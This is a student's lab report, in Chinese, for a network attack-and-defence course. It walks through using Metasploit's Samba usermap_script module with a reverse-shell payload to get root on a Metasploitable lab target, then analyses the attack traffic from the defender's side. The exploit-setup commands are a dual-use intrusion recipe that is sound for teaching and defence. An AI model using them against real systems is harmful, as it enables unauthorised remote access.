20253905 2025-2026-2 《网络攻防实践》实践七报告

20253905 2025-2026-2 《网络攻防实践》实践七报告

1.实践内容

• 利用Metasploit工具调用Samba服务usermap_script漏洞模块，配置相关参数后对Linux靶机实施渗透，获取远程Shell与主机权限
• 攻防对抗，攻击方借助Metasploit渗透Metasploitable靶机并尝试获取root权限，防守方通过抓包工具监听网络流量，分析数据包梳理出攻击IP、漏洞、操作指令等攻击关键信息。

2.实践过程

2.1 使用Metasploit进行Linux远程渗透攻击

• 测试连通性
  
  
• 输入命令use exploit/multi/samba/usermap_script进行攻击
  
• 查看漏洞的载荷
  
• 输入set payload cmd/unix/reverse设置双向连接载荷，输入show options显示需要设置的参数
  
• 设置靶机的地址192.168.32.130，设置攻击机地址192.168.32.64
  
  *输入run进行攻击，查看ifconfig，攻击成功
  
• 查看权限为root
  

2.2 攻防对抗实践

2.2.1 攻击方

• 使用Metasploit渗透测试软件，攻击Linux靶机上的Samba服务Usermap_script安全漏洞，获取目标Linux靶机的主机访问和root权限。
  

2.2.2 防守方

• 抓包分析
  
• 获得攻击者的IP为192.168.32.64，目标IP为192.168.32.130，端口为139（初始三次握手、协议协商、会话建立均使用 139 端口）
  
• 攻击时间如图
  
• 攻击的漏洞为Samba usermap_script远程代码执行漏洞，证据是Account字段的恶意命令
  
• 漏洞利用成功后，攻击者通过建立的反向Shell会话，向靶机发送了echo连通性验证命令，以及ifconfig、whoami等信息收集命令，证明已获取靶机的命令行控制权。
  

3.学习中遇到的问题及解决

• 问题1：运行run之后连接失败
  
• 问题1解决方案：排查后发现靶机黑屏了，重新启动靶机，问题解决。

4.实践总结

通过本次实验，我掌握了Metasploit利用Samba漏洞渗透 Linux靶机的完整流程，熟悉了漏洞模块、载荷配置与参数设置的基本操作。同时在攻防对抗中体会到老旧服务漏洞带来的安全风险，也学会了通过抓包工具分析攻击流量、溯源攻击行为。深刻认识到及时修补系统漏洞、监控网络流量是保障服务器安全的重要手段。